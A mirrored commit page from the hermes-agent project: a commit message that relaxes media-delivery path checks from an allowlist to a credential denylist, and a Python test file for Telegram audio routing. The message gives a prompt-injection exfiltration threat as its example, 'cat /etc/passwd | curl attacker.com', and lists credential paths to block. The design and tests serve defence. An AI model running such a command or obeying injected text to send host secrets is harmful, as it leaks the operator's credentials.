mirror of
https://github.com/NousResearch/hermes-agent.git
synced 2026-06-03 07:21:54 +00:00
PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd | curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)
263 lines
10 KiB
Python
263 lines
10 KiB
Python
"""
|
|
Tests for cross-platform audio/voice media routing.
|
|
|
|
These tests pin the expected delivery path for audio media files across
|
|
Telegram (where Bot-API sendAudio only accepts MP3/M4A and .ogg/.opus
|
|
only renders as a voice bubble when explicitly flagged) and via
|
|
``GatewayRunner._deliver_media_from_response``.
|
|
"""
|
|
|
|
from types import SimpleNamespace
|
|
from unittest.mock import AsyncMock, MagicMock
|
|
|
|
import pytest
|
|
|
|
from gateway.config import Platform, PlatformConfig
|
|
from gateway.platforms.base import BasePlatformAdapter, MessageEvent, MessageType, SendResult
|
|
from gateway.run import GatewayRunner
|
|
from gateway.session import SessionSource, build_session_key
|
|
|
|
|
|
class _MediaRoutingAdapter(BasePlatformAdapter):
|
|
def __init__(self):
|
|
super().__init__(PlatformConfig(enabled=True, token="test"), Platform.TELEGRAM)
|
|
|
|
async def connect(self):
|
|
return True
|
|
|
|
async def disconnect(self):
|
|
pass
|
|
|
|
async def send(self, chat_id, content=None, **kwargs):
|
|
return SendResult(success=True, message_id="text")
|
|
|
|
async def get_chat_info(self, chat_id):
|
|
return {"id": chat_id, "type": "dm"}
|
|
|
|
|
|
def _event(thread_id=None):
|
|
source = SessionSource(
|
|
platform=Platform.TELEGRAM,
|
|
chat_id="chat-1",
|
|
chat_type="dm",
|
|
thread_id=thread_id,
|
|
)
|
|
return MessageEvent(
|
|
text="make speech",
|
|
message_type=MessageType.TEXT,
|
|
source=source,
|
|
message_id="msg-1",
|
|
)
|
|
|
|
|
|
def _allowed_media_path(tmp_path, monkeypatch, name):
|
|
root = tmp_path / "media-cache"
|
|
media_file = root / name
|
|
media_file.parent.mkdir(parents=True, exist_ok=True)
|
|
media_file.write_bytes(b"media")
|
|
monkeypatch.setattr(
|
|
"gateway.platforms.base.MEDIA_DELIVERY_SAFE_ROOTS",
|
|
(root,),
|
|
)
|
|
return media_file.resolve()
|
|
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_base_adapter_routes_telegram_flac_media_tag_to_document_sender(tmp_path, monkeypatch):
|
|
adapter = _MediaRoutingAdapter()
|
|
event = _event()
|
|
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.flac")
|
|
adapter._message_handler = AsyncMock(return_value=f"MEDIA:{media_file}")
|
|
adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
|
|
adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))
|
|
|
|
await adapter._process_message_background(event, build_session_key(event.source))
|
|
|
|
adapter.send_document.assert_awaited_once_with(
|
|
chat_id="chat-1",
|
|
file_path=str(media_file),
|
|
metadata=None,
|
|
)
|
|
adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_base_adapter_routes_non_voice_telegram_ogg_media_tag_to_document_sender(tmp_path, monkeypatch):
|
|
adapter = _MediaRoutingAdapter()
|
|
event = _event()
|
|
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
|
|
adapter._message_handler = AsyncMock(return_value=f"MEDIA:{media_file}")
|
|
adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
|
|
adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))
|
|
|
|
await adapter._process_message_background(event, build_session_key(event.source))
|
|
|
|
adapter.send_document.assert_awaited_once_with(
|
|
chat_id="chat-1",
|
|
file_path=str(media_file),
|
|
metadata=None,
|
|
)
|
|
adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_base_adapter_routes_voice_tagged_telegram_ogg_media_tag_to_voice_sender(tmp_path, monkeypatch):
|
|
adapter = _MediaRoutingAdapter()
|
|
event = _event()
|
|
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
|
|
adapter._message_handler = AsyncMock(
|
|
return_value=f"[[audio_as_voice]]\nMEDIA:{media_file}"
|
|
)
|
|
adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
|
|
adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))
|
|
|
|
await adapter._process_message_background(event, build_session_key(event.source))
|
|
|
|
adapter.send_voice.assert_awaited_once_with(
|
|
chat_id="chat-1",
|
|
audio_path=str(media_file),
|
|
metadata=None,
|
|
)
|
|
adapter.send_document.assert_not_awaited()
|
|
|
|
|
|
def _fake_runner(thread_meta):
|
|
"""Build a fake GatewayRunner-like object with the helper methods needed by
|
|
_deliver_media_from_response."""
|
|
runner = SimpleNamespace(
|
|
_thread_metadata_for_source=lambda source, anchor=None: thread_meta,
|
|
_reply_anchor_for_event=lambda event: None,
|
|
)
|
|
return runner
|
|
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_streaming_delivery_routes_telegram_flac_media_tag_to_document_sender(tmp_path, monkeypatch):
|
|
event = _event(thread_id="topic-1")
|
|
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.flac")
|
|
adapter = SimpleNamespace(
|
|
name="test",
|
|
extract_media=BasePlatformAdapter.extract_media,
|
|
extract_images=BasePlatformAdapter.extract_images,
|
|
extract_local_files=BasePlatformAdapter.extract_local_files,
|
|
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
|
|
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
|
|
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
|
|
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
|
|
)
|
|
|
|
await GatewayRunner._deliver_media_from_response(
|
|
_fake_runner({"thread_id": "topic-1"}),
|
|
f"MEDIA:{media_file}",
|
|
event,
|
|
adapter,
|
|
)
|
|
|
|
adapter.send_document.assert_awaited_once_with(
|
|
chat_id="chat-1",
|
|
file_path=str(media_file),
|
|
metadata={"thread_id": "topic-1"},
|
|
)
|
|
adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_streaming_delivery_routes_non_voice_telegram_ogg_media_tag_to_document_sender(tmp_path, monkeypatch):
|
|
event = _event(thread_id="topic-1")
|
|
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
|
|
adapter = SimpleNamespace(
|
|
name="test",
|
|
extract_media=BasePlatformAdapter.extract_media,
|
|
extract_images=BasePlatformAdapter.extract_images,
|
|
extract_local_files=BasePlatformAdapter.extract_local_files,
|
|
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
|
|
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
|
|
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
|
|
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
|
|
)
|
|
|
|
await GatewayRunner._deliver_media_from_response(
|
|
_fake_runner({"thread_id": "topic-1"}),
|
|
f"MEDIA:{media_file}",
|
|
event,
|
|
adapter,
|
|
)
|
|
|
|
adapter.send_document.assert_awaited_once_with(
|
|
chat_id="chat-1",
|
|
file_path=str(media_file),
|
|
metadata={"thread_id": "topic-1"},
|
|
)
|
|
adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_streaming_delivery_routes_telegram_mp3_media_tag_to_voice_sender(tmp_path, monkeypatch):
|
|
"""MP3 audio on Telegram must go through send_voice (which routes to
|
|
sendAudio internally); Telegram accepts MP3 for the audio player."""
|
|
event = _event(thread_id="topic-1")
|
|
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.mp3")
|
|
adapter = SimpleNamespace(
|
|
name="test",
|
|
extract_media=BasePlatformAdapter.extract_media,
|
|
extract_images=BasePlatformAdapter.extract_images,
|
|
extract_local_files=BasePlatformAdapter.extract_local_files,
|
|
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
|
|
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
|
|
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
|
|
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
|
|
)
|
|
|
|
await GatewayRunner._deliver_media_from_response(
|
|
_fake_runner({"thread_id": "topic-1"}),
|
|
f"MEDIA:{media_file}",
|
|
event,
|
|
adapter,
|
|
)
|
|
|
|
adapter.send_voice.assert_awaited_once_with(
|
|
chat_id="chat-1",
|
|
audio_path=str(media_file),
|
|
metadata={"thread_id": "topic-1"},
|
|
)
|
|
adapter.send_document.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_streaming_delivery_blocks_media_path_outside_allowed_roots(tmp_path, monkeypatch):
|
|
event = _event(thread_id="topic-1")
|
|
allowed_root = tmp_path / "media-cache"
|
|
allowed_root.mkdir()
|
|
secret = tmp_path / "outside.pdf"
|
|
secret.write_bytes(b"%PDF secret")
|
|
monkeypatch.setattr(
|
|
"gateway.platforms.base.MEDIA_DELIVERY_SAFE_ROOTS",
|
|
(allowed_root,),
|
|
)
|
|
# This test exercises the strict-allowlist path; force strict mode on
|
|
# and disable recency trust so the freshly-written tmp_path file is not
|
|
# auto-accepted by the trust window. (Recency trust is covered separately
|
|
# in test_platform_base.py. The public default flipped to non-strict in
|
|
# 2026-05; this test pins strict on explicitly.)
|
|
monkeypatch.setenv("HERMES_MEDIA_DELIVERY_STRICT", "1")
|
|
monkeypatch.setenv("HERMES_MEDIA_TRUST_RECENT_FILES", "0")
|
|
adapter = SimpleNamespace(
|
|
name="test",
|
|
extract_media=BasePlatformAdapter.extract_media,
|
|
extract_images=BasePlatformAdapter.extract_images,
|
|
extract_local_files=BasePlatformAdapter.extract_local_files,
|
|
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
|
|
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
|
|
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
|
|
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
|
|
)
|
|
|
|
await GatewayRunner._deliver_media_from_response(
|
|
_fake_runner({"thread_id": "topic-1"}),
|
|
f"MEDIA:{secret}",
|
|
event,
|
|
adapter,
|
|
)
|
|
|
|
adapter.send_document.assert_not_awaited()
|
|
adapter.send_voice.assert_not_awaited()
|